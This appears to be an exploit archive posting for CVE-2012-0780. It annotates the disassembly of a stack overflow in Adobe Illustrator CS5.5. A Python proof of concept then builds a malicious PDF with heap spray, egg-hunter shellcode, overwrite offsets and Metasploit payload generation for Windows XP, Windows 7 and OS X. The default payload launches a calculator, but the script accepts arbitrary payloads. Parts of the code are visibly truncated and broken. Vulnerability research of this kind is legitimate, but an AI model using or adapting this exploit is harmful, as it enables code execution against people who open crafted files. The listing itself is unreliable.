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Adobe Illustrator CS5.5 Memory Corruption Proof Of Concept

Adobe Illustrator CS5.5 Memory Corruption Proof Of Concept
Posted Jun 14, 2012
Authored by Felipe Andres Manzano

Adobe Illustrator CS5.5 memory corruption proof of concept exploit that spawns a calculator.

tags | exploit, proof of concept
advisories | CVE-2012-0780
SHA-256 | 35acd4b2f3b86dad800d4dd1e04e53c4376cae35b9ee1d7a968284f59cf357ee

Adobe Illustrator CS5.5 Memory Corruption Proof Of Concept

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#### Felipe Andres Manzano * felipe.andres.manzano@gmail.com ####
The vulnerable function follows...
.text:004A7200 ; =============== S U B R O U T I N E =======================================
.text:004A7200 ; Attributes: bp-based frame
.text:004A7200 sub_4A7200 proc near
.text:004A7200 var_11C = dword ptr -11Ch
.text:004A7200 var_118 = dword ptr -118h
.text:004A7200 var_114 = byte ptr -114h
.text:004A7200 var_14 = dword ptr -14h
.text:004A7200 var_10 = dword ptr -10h
.text:004A7200 var_C = dword ptr -0Ch
.text:004A7200 var_4 = dword ptr -4
.text:004A7200 arg_0 = dword ptr 8
.text:004A7200 push ebp
.text:004A7201 mov ebp, esp
.text:004A7203 push 0FFFFFFFFh
.text:004A7205 push offset loc_C3B8C0
.text:004A720A mov eax, large fs:0
.text:004A7210 push eax
.text:004A7211 sub esp, 110h ;Make room for a 256 bytes buffer, etc
.text:004A7217 mov eax, dword_FB3380
.text:004A721C xor eax, ebp
.text:004A721E mov [ebp+var_14], eax ;Cookie! Immediately after the buffer
.text:004A7221 push ebx
.text:004A7222 push esi
.text:004A7223 push edi
.text:004A7224 push eax
.text:004A7225 lea eax, [ebp+var_C]
.text:004A7228 mov large fs:0, eax
.text:004A722E mov [ebp+var_10], esp
.text:004A7231 mov ebx, [ebp+arg_0]
.text:004A7234 mov edi, ecx
.text:004A7236 mov ecx, ebx
.text:004A7238 mov [ebp+var_118], ebx
.text:004A723E call std::basic_string::length(...) ;Original size offending size
;(It doesn;t stop at null chars)
.text:004A7244 mov esi, eax
.text:004A7246 push esi
.text:004A7247 mov ecx, ebx
.text:004A7249 call std::basic_string::c_str(...)
.text:004A724F push eax
.text:004A7250 lea eax, [ebp+var_114]
.text:004A7256 push eax
.text:004A7257 call memcpy ;STACK OVERFLOW! (If more than 256 bytes)
.text:004A725C lea eax, [ebp+esi+var_114]
.text:004A7263 add esp, 0Ch
.text:004A7266 mov [ebp+var_11C], eax
.text:004A726C mov byte ptr [eax], 0
.text:004A726F mov [ebp+var_4], 0
.text:004A7276 lea esi, [ebp+var_114]
.text:004A727C lea esp, [esp+0]
.text:004A7280 loc_4A7280:
.text:004A7280 cmp esi, eax
.text:004A7282 jnb short loc_4A72B6
.text:004A7284 mov edx, [edi]
.text:004A7286 mov eax, [edx+4]
.text:004A7289 push esi
.text:004A728A mov ecx, edi
.text:004A728C call eax ;Iterates over the stack copied buffer
;applying a 'locale'? character translation
;(Invalid chars noted in exploit)
.text:004A728E test eax, eax
.text:004A7290 jg short loc_4A7297
.text:004A7292 mov eax, 1
.text:004A7297 loc_4A7297:
.text:004A7297 add esi, eax
.text:004A7299 mov eax, [ebp+var_11C]
.text:004A729F jmp short loc_4A7280
.text:004A72AE ; ---------------------------------------------------------------------------
.text:004A72AE loc_4A72AE:
.text:004A72AE mov ebx, [ebp+var_118]
.text:004A72B4 jmp short loc_4A72BD
.text:004A72B6 ; ---------------------------------------------------------------------------
.text:004A72B6 loc_4A72B6:
.text:004A72B6 mov [ebp+var_4], 0FFFFFFFFh
.text:004A72BD loc_4A72BD:
.text:004A72BD lea ecx, [ebp+var_114]
.text:004A72C3 push ecx
.text:004A72C4 mov ecx, ebx
.text:004A72C6 call std::basic_string::operator=(...) ;Here, due to local values
;corruption it is possible to
;write a translated version of
;our buffer to anywhere
.text:004A72CC mov ecx, [ebp+var_C]
.text:004A72CF mov large fs:0, ecx
.text:004A72D6 pop ecx
.text:004A72D7 pop edi
.text:004A72D8 pop esi
.text:004A72D9 pop ebx
.text:004A72DA mov ecx, [ebp+var_14]
.text:004A72DD xor ecx, ebp
.text:004A72DF call sub_C27512 ;Check the cookie
.text:004A72E4 mov esp, ebp
.text:004A72E6 pop ebp
.text:004A72E7 retn 4
.text:004A72E7 sub_4A7200 endp


#Exploit PoC begins...
from miniPDF import * #http://pastebin.com/LUTXSSvV
import zlib,struct,os,optparse,hashlib
from subprocess import Popen, PIPE
#Character translation map for the copied buffer (Reversed from function 004A72F0)
invalid = [ i for i in xrange(0,0xff+1) if cmap[i] != i and i>0x1f]

def getXImage(width, height, fill='\x90', tail='\xcc'):
[ a b c d tx ty ] llx lly urx ury h w bits ImageType AlphaChannelCount reserved bin-ascii ImageMask XI
Arguments to the XI operator specify the location and size of the image, its
pixel bit depth, color type, and other attributes

The image matrix maps the unit square of user space, bounded by
(0, 0) and (1, 1) in user space, to the boundary of the source image in
image space.

doc = '''0 A
0 O
0 g
0 J 0 j 1 w 10 M []0 d
0 XR
[$width$ 0 0 $height$ 0 0] 0 0 $width$ $height$ $width$ $height$ 8 1 0 0 $bin_ascii$ 0
%%BeginData: $size$
bin_ascii = 1 #binary
doc = doc.replace('$width$','%d'%width)
doc = doc.replace('$height$','%d'%height)
doc = doc.replace('$bin_ascii$','%d'%bin_ascii)
doc = doc.replace('$size$','%d'%(width*height))

data = (fill*(width*height))
data = data[:width*height-len(tail)]+tail

if bin_ascii == 0:
data = data.encode('hex')
data_formated = ''
for i in xrange(0,len(data)+62,62):
data_formated += '%'+data[i:i+62]+'\n'
data = data_formated
doc = doc.replace('$data$',data)
return doc

def makeASCIICode(msfpayload):
msfpayload = Popen('msfpayload3.5 %s R'%msfpayload, shell=True, stdout=PIPE)
msfencode = Popen("msfencode3.5 BufferRegister=EAX -e x86/alpha_mixed -b '%s' -t raw"%''.join(['\\x%02x'%x for x in invalid]),
code = msfencode.communicate()[0]
return code

def mkAIPrivate(options):
baseai = '''
%%Creator: Adobe Illustrator(TM) 3.2
%%AI8_CreatorVersion: 15.0.2
%AI5_FileFormat 11.0
%%For: (Administrator) ()
%%Title: (thafile.ai)
%%CreationDate: 1/21/2011 12:32 PM
%%Canvassize: 16383
%%BoundingBox: 29 -389 198 75
%%DocumentProcessColors: Black
%%DocumentFonts: MyriadPro-Regular
%%DocumentNeededFonts: MyriadPro-Regular
%%DocumentNeededResources: procset Adobe_packedarray 2.0 0
%%+ procset Adobe_cshow 1.1 0
%%+ procset Adobe_customcolor 1.0 0
%%+ procset Adobe_typography_AI3 1.0 1
%%+ procset Adobe_pattern_AI3 1.0 0
%%+ procset Adobe_Illustrator_AI3 1.0 1
%AI3_ColorUsage: Color
%AI3_TemplateBox: 298 -421 298 -421
%AI3_TileBox: -8.35986 -816.9453 603.6406 -24.9448
%AI3_DocumentPreview: None
%%PageOrigin:-8 -817
%AI7_GridSettings: 72 8 72 8 1 0 0.8 0.8 0.8 0.9 0.9 0.9
%AI9_Flatten: 1
%AI12_CMSettings: 00.MS
%%IncludeResource: procset Adobe_packedarray 2.0 0
Adobe_packedarray /initialize get exec
%%IncludeResource: procset Adobe_cshow 1.1 0
%%IncludeResource: procset Adobe_customcolor 1.0 0
%%IncludeResource: procset Adobe_typography_AI3 1.0 1
%%IncludeResource: procset Adobe_pattern_AI3 1.0 0
%%IncludeResource: procset Adobe_Illustrator_AI3 1.0 1
%%IncludeFont: MyriadPro-Regular
Adobe_cshow /initialize get exec
Adobe_customcolor /initialize get exec
Adobe_typography_AI3 /initialize get exec
Adobe_pattern_AI3 /initialize get exec
Adobe_Illustrator_AI3 /initialize get exec
39/quotesingle 96/grave 128/Euro 130/quotesinglbase/florin/quotedblbase/ellipsis
/dagger/daggerdbl/circumflex/perthousand/Scaron/guilsinglleft/OE 145/quoteleft
/scaron/guilsinglright/oe/dotlessi 159/Ydieresis /space 164/currency 166/brokenbar
168/dieresis/copyright/ordfeminine 172/logicalnot/hyphen/registered/macron/ring
/plusminus/twosuperior/threesuperior/acute/mu 183/periodcentered/cedilla
/onesuperior/ordmasculine 188/onequarter/onehalf/threequarters 192/Agrave
%AI3_BeginEncoding: _MyriadPro-Regular MyriadPro-Regular
[/_MyriadPro-Regular/MyriadPro-Regular 0 0 1 TZ
%AI3_EndEncoding AdobeType
0 To
1 0 0 1 63.9058 -54.9058 0 Tp
1 0 0 1 63.9058 -54.9058 Tm
0 Tr
0 O
0 0 0 1 k
4 M
/_MyriadPro-Regular 12 Tf
100 Tz
0 Tt
0 0 Tl
0 Tc
($PATTERN$) Tx 1 0 Tk
gsave annotatepage grestore showpage
Adobe_Illustrator_AI3 /terminate get exec
Adobe_pattern_AI3 /terminate get exec
Adobe_typography_AI3 /terminate get exec
Adobe_customcolor /terminate get exec
Adobe_cshow /terminate get exec
Adobe_packedarray /terminate get exec

#configure token and search code snipet
token = 0x494c4546

if options.w7:
#Win7 In w7 the environment memory is 0x10000bytes long!
msfpayload = 'windows/exec CMD=calc.exe EXITFUNC=process'
baseai = baseai.replace('$HEAPSPRAY$','')
jmp_addr = 0x00001FF01
write_addr = 0x0001FF01
elif options.xp:
msfpayload = 'windows/exec CMD=calc.exe EXITFUNC=process'
baseai = baseai.replace('$HEAPSPRAY$','')
jmp_addr = 0x10F00
write_addr = 0x10F00
elif options.osx:
code = Popen('msfpayload3.5 osx/x86/exec CMD=/Applications/Calculator.app/Contents/MacOS/Calculator EXITFUNC=process R', shell=True, stdout=PIPE).communicate()[0]
baseai = baseai.replace('$HEAPSPRAY$',getXImage(1020,1024,fill='\x90',tail='\xcc'+code+'\xcc')*300 )
payload = "A"*284
payload += struct.pack("<L", 0x31000100)
#Write the string in octal form
ai_data = baseai.replace('$PATTERN$', ''.join(['\\%o'%ord(i) for i in payload]))
return ai_data
elif options.multi:
msfpayload = 'windows/exec CMD=calc.exe EXITFUNC=seh'
jmp_addr = 0x18e41111
write_addr = 0xFFFF #Segfault
#configure token and search code snipet
search = '\x80\x79\xff\x01' #CMP BYTE [ECX-1],1
search += '\x74\x18' #JZ fixstack
search += '\xc6\x41\xff\x01' #MOV BYTE [ECX-1],1
search += '\x58' #search: pop EAX
search += '\x3D'+struct.pack('<L',token) #cmp EAX, $token
search += '\x75\xF8' #jnz %search
search += '\x89\xe0' #mov eax,esp
search += '\x81\xec'+struct.pack("<L",0x1000) #sub esp, 0x1000
search += '\x89\xe5' #mov ebp,esp
search += '\xFF\xD0' #CALL EAX
##Second crash fix stack
# Search for stack signature (Tested in 15.0.0 15.0.1 15.0.2)
# 00000045
# 00000001
# 00000000
# 00000045
search += '\x81\xc4'+struct.pack("<L",0x1000) #add esp, 0x1000
search += '\x58' #POP EAX
search += '\x40' #INC EAX
search += '\x83\xF8\x46' #CMP EAX,46
search += '\x75\xF9' #JNE SHORT loop
search += '\x58' #POP EAX
search += '\x40' #INC EAX
search += '\x83\xF8\x02' #CMP EAX,02
search += '\x75\xF9' #JNE SHORT loop
search += '\x58' #POP EAX
search += '\x40' #INC EAX
search += '\x83\xF8\x01' #CMP EAX,01
search += '\x75\xF9' #JNE SHORT loop
search += '\x58' #POP EAX
search += '\x40' #INC EAX
search += '\x83\xF8\x46' #CMP EAX,46
search += '\x75\xF9' #JNE SHORT loop
#Fix frame and return
search += '\x83\xEC\x1C' #SUB ESP,1C
search += '\x5d' #POP EBP
search += '\xc3' #RET

baseai = baseai.replace('$HEAPSPRAY$',getXImage(1020,1024,fill='\x90',tail=search)*300 )
def pattern(size):
def _pattern():
for i in xrange(ord('a'),ord('z')+1):
for j in xrange(ord('0'),ord('9')+1):
for k in xrange(ord('A'),ord('Z')+1):
for h in xrange(ord('0'),ord('9')+1):
yield chr(i)
yield chr(j)
yield chr(k)
yield chr(h)
return ''.join(list(_pattern())[:size])
p = pattern(3000)
ai_data = baseai.replace('($PATTERN$)', '('+p+')').replace('$HEAPSPRAY$',getXImage(1020,1024)*20)
return ai_data

#prepare shellcode..
if options.payload:
msfpayload = args[1]

code = makeASCIICode(msfpayload)

search = '\x58' #search: pop EAX
search += '\x3D'+struct.pack('<L',token) #cmp EAX, $token
search += '\x75\xF8' #jnz %search
search += '\x89\xe0' #mov eax,esp
search += '\x89\xe5' #mov ebp,esp
search += '\xFF\xD0' #CALL EAX
payload = search
payload += 'A'*(268 - len(payload))
payload += struct.pack('<L',jmp_addr) #offset 268
payload += 'B'*(352 - len(payload))
payload += struct.pack('<L', write_addr) #offset 352 (originally a heap address)
payload += 'C'*(376 - len(payload))
payload += struct.pack('<L',token) #offset 376
payload += code #offset 380

assert len(payload)<=0x3000, 'Payload too long!, it may hit the end of the stack'
#Double check it doesn't have invalid chars...
for c in search:
assert not ord(c) in invalid, 'c:%s is in %s'%('%02x'%ord(c),['\\x%02x'%x for x in invalid])

#Write the string in octal form
ai_data = baseai.replace('$PATTERN$', ''.join(['\\%o'%ord(i) for i in payload]))

#ai_data holds the ai private data to we inserted in the pdf shell
return ai_data

def mkPDFShell(ai_data):
#The document
doc = PDFDoc()
font = PDFDict()
font.add('Name', PDFName('F1'))
font.add('Subtype', PDFName('Type1'))
font.add('BaseFont', PDFName('Helvetica'))
#name:font map
fontname = PDFDict()
resources = PDFDict()
contents= PDFStream({},'BT /F1 24 Tf 240 700 Td (Pedefe Pedefeito Pedefeon!) Tj ET')
#begin illustrator bit
private = PDFDict()
illustrator = PDFDict()

#slice the private data in 64k packs
data = ai_data
compress = {}
chunk_size = 0xffff*20
for i in xrange(0,len(data)/chunk_size+1):
priv_data = PDFStream({'Filter': '/FlateDecode'},data[chunk_size*i:chunk_size*(i+1)].encode('zlib'))
hsh = hashlib.md5(priv_data.stream)
if not hsh.hexdigest() in compress.keys():
ref = PDFRef(priv_data)
compress[hsh.hexdigest()] = ref



page = PDFDict()
page.add('Contents', PDFRef(contents))
page.add('PieceInfo',PDFDict({'Illustrator': PDFRef(illustrator)}))
pages = PDFDict()
pages.add('Type', PDFName('Pages'))
pages.add('Kids', PDFArray([PDFRef(page)]))
pages.add('Count', PDFNum(1))
#add parent reference in page
catalog = PDFDict()
catalog.add('Type', PDFName('Catalog'))
catalog.add('Pages', PDFRef(pages))
return str(doc)

if __name__ == '__main__':

parser = optparse.OptionParser(description='Adobe Illustrator File Format Tx operator Stack Overflow')
parser.add_option('--debug', action='store_true', default=False, help='For debugging')
parser.add_option('--multi', action='store_true', default=False, help='Heapspraying for multitarget')
parser.add_option('--w7', action='store_true', default=False, help='For Windows7')
parser.add_option('--xp', action='store_true', default=False, help='For Windows XP (generic)')
parser.add_option('--osx', action='store_true', default=False, help='For OSX (tested on plain leopard)')
parser.add_option('--payload', action='store_true', default=False, help="Metasploit payload. Ex. 'windows/exec CMD=calc.exe'")
parser.add_option('--doc', action='store_true', default=False, help='Print detailed documentation')
(options, args) = parser.parse_args()
if not options.w7 + options.xp + options.debug + options.multi + options.osx + options.doc== 1:
print 'Try --help'
elif options.doc:
print __doc__

ai_data = mkAIPrivate(options)
print mkPDFShell(ai_data)

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